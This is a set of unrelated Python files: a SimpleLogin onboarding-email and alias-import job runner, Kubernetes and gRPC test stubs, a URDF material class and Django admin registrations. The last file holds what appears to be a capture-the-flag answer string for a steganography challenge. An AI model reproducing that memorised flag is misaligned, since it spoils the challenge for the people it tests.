render("com/onboarding/send-from-alias.txt", user=user, to_email=to_email),
render("com/onboarding/send-from-alias.html", user=user, to_email=to_email),
unsubscribe_link,
via_email,
)
def onboarding_pgp(user):
to_email, unsubscribe_link, via_email = user.get_communication_email()
if not to_email:
return
send_email(
to_email,
"SimpleLogin Tip: Secure your emails with PGP",
render("com/onboarding/pgp.txt", user=user, to_email=to_email),
render("com/onboarding/pgp.html", user=user, to_email=to_email),
unsubscribe_link,
via_email,
)
def onboarding_browser_extension(user):
to_email, unsubscribe_link, via_email = user.get_communication_email()
if not to_email:
return
send_email(
to_email,
"SimpleLogin Tip: Chrome/Firefox/Safari extensions and Android/iOS apps",
render("com/onboarding/browser-extension.txt", user=user, to_email=to_email),
render("com/onboarding/browser-extension.html", user=user, to_email=to_email),
unsubscribe_link,
via_email,
)
def onboarding_mailbox(user):
to_email, unsubscribe_link, via_email = user.get_communication_email()
if not to_email:
return
send_email(
to_email,
"SimpleLogin Tip: Multiple mailboxes",
render("com/onboarding/mailbox.txt", user=user, to_email=to_email),
render("com/onboarding/mailbox.html", user=user, to_email=to_email),
unsubscribe_link,
via_email,
)
def handle_batch_import(batch_import: BatchImport):
user = batch_import.user
batch_import.processed = True
db.session.commit()
LOG.debug("Start batch import for %s %s", batch_import, user)
file_url = s3.get_url(batch_import.file.path)
LOG.d("Download file %s from %s", batch_import.file, file_url)
r = requests.get(file_url)
lines = [line.decode() for line in r.iter_lines()]
reader = csv.DictReader(lines)
for row in reader:
try:
full_alias = sanitize_email(row["alias"])
note = row["note"]
except KeyError:
LOG.warning("Cannot parse row %s", row)
continue
alias_domain = get_email_domain_part(full_alias)
custom_domain = CustomDomain.get_by(domain=alias_domain)
if (
not custom_domain
or not custom_domain.verified
or custom_domain.user_id != user.id
):
LOG.debug("domain %s can't be used %s", alias_domain, user)
continue
if (
Alias.get_by(email=full_alias)
or DeletedAlias.get_by(email=full_alias)
or DomainDeletedAlias.get_by(email=full_alias)
):
LOG.d("alias already used %s", full_alias)
continue
alias = Alias.create(
user_id=user.id,
email=full_alias,
note=note,
mailbox_id=user.default_mailbox_id,
custom_domain_id=custom_domain.id,
batch_import_id=batch_import.id,
)
db.session.commit()
LOG.d("Create %s", alias)
if __name__ == "__main__":
while True:
# run a job 1h earlier or later is not a big deal ...
min_dt = arrow.now().shift(hours=-1)
max_dt = arrow.now().shift(hours=1)
app = new_app()
with app.app_context():
for job in Job.query.filter(
Job.taken.is_(False), Job.run_at > min_dt, Job.run_at <= max_dt
).all():
LOG.d("Take job %s", job)
# mark the job as taken, whether it will be executed successfully or not
job.taken = True
db.session.commit()
if job.name == JOB_ONBOARDING_1:
user_id = job.payload.get("user_id")
user = User.get(user_id)
# user might delete their account in the meantime
# or disable the notification
if user and user.notification and user.activated:
LOG.d("send onboarding send-from-alias email to user %s", user)
onboarding_send_from_alias(user)
elif job.name == JOB_ONBOARDING_2:
user_id = job.payload.get("user_id")
user = User.get(user_id)
# user might delete their account in the meantime
# or disable the notification
if user and user.notification and user.activated:
LOG.d("send onboarding mailbox email to user %s", user)
onboarding_mailbox(user)
elif job.name == JOB_ONBOARDING_4:
user_id = job.payload.get("user_id")
user = User.get(user_id)
# user might delete their account in the meantime
# or disable the notification
if user and user.notification and user.activated:
LOG.d("send onboarding pgp email to user %s", user)
onboarding_pgp(user)
elif job.name == JOB_BATCH_IMPORT:
batch_import_id = job.payload.get("batch_import_id")
batch_import = BatchImport.get(batch_import_id)
handle_batch_import(batch_import)
else:
LOG.exception("Unknown job name %s", job.name)
time.sleep(10)
|
py | b414f8d866853c7cc15ed971aab81d13fc9b6d69 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_local_volume_source import V1LocalVolumeSource
class TestV1LocalVolumeSource(unittest.TestCase):
""" V1LocalVolumeSource unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1LocalVolumeSource(self):
"""
Test V1LocalVolumeSource
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1_local_volume_source.V1LocalVolumeSource()
pass
if __name__ == '__main__':
unittest.main()
|
py | b414f8e6f690771026d4f3b7422bbe089175c1e4 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import time
import threading
import unittest
from grpc._cython import cygrpc
# TODO(nathaniel): This should be at least one hundred. Why not one thousand?
_PARALLELISM = 4
def _channel_and_completion_queue():
channel = cygrpc.Channel('localhost:54321', cygrpc.ChannelArgs(()))
completion_queue = cygrpc.CompletionQueue()
return channel, completion_queue
def _connectivity_loop(channel, completion_queue):
for _ in range(100):
connectivity = channel.check_connectivity_state(True)
channel.watch_connectivity_state(
connectivity, cygrpc.Timespec(time.time() + 0.2), completion_queue,
None)
completion_queue.poll(deadline=cygrpc.Timespec(float('+inf')))
def _create_loop_destroy():
channel, completion_queue = _channel_and_completion_queue()
_connectivity_loop(channel, completion_queue)
completion_queue.shutdown()
def _in_parallel(behavior, arguments):
threads = tuple(
threading.Thread(target=behavior, args=arguments)
for _ in range(_PARALLELISM))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
class ChannelTest(unittest.TestCase):
def test_single_channel_lonely_connectivity(self):
channel, completion_queue = _channel_and_completion_queue()
_in_parallel(_connectivity_loop, (channel, completion_queue,))
completion_queue.shutdown()
def test_multiple_channels_lonely_connectivity(self):
_in_parallel(_create_loop_destroy, ())
if __name__ == '__main__':
unittest.main(verbosity=2)
|
py | b414f9b0fca0811134d4aeb98595a415b7f7c71d | from pyrosim.commonFunctions import Save_Whitespace
class MATERIAL:
def __init__(self, name="Cyan", color_rgba=[0, 1, 1, 1]):
self.depth = 3
self.string1 = f'<material name="{name}">'
self.string2 = f' <color rgba="{color_rgba[0]} {color_rgba[1]} {color_rgba[2]} {color_rgba[3]}"/>'
self.string3 = f'</material>'
def Save(self,f):
Save_Whitespace(self.depth,f)
f.write( self.string1 + '\n' )
Save_Whitespace(self.depth,f)
f.write( self.string2 + '\n' )
Save_Whitespace(self.depth,f)
f.write( self.string3 + '\n' )
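# --- Usage sketch (illustrative addition, not part of the original module) ---
# MATERIAL.Save() writes an indented URDF <material> block to an open text
# file. The output file name below is hypothetical.
if __name__ == "__main__":
    with open("material_snippet.urdf", "w") as f:
        MATERIAL(name="Red", color_rgba=[1, 0, 0, 1]).Save(f)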
|
py | b414fa381d241b5c74067a3c5009d9f1012caaa1 | from django.contrib import admin
from main.models import HbBlockData, Reception
class HbBlockDataAdmin(admin.ModelAdmin):
fieldsets = [
('BlockData', {'fields': ['ownerBlockId', 'url', 'publicKey', 'createDate']}),
('BlockDComments', {'fields': ['comments']})
]
class ReceptionAdmin(admin.ModelAdmin):
fieldsets = [
('Reception', {'fields': ['rid', 'mediatorId', 'receptionistId', 'adopterId', 'status', 'url', 'hash',
'createDate', 'confirmDate']}),
('ReceptionComments', {'fields': ['comments', 'opinionDate', 'opinions']})
]
admin.site.register(HbBlockData, HbBlockDataAdmin)
admin.site.register(Reception, ReceptionAdmin)
|
py | b414fa53e584e8a63b62b0d709053f2b2fe46fe6 | MSG = (
"Another World was a fun game. But not as fun as DrgnS{MoarBMPstegano!!!}"
)
|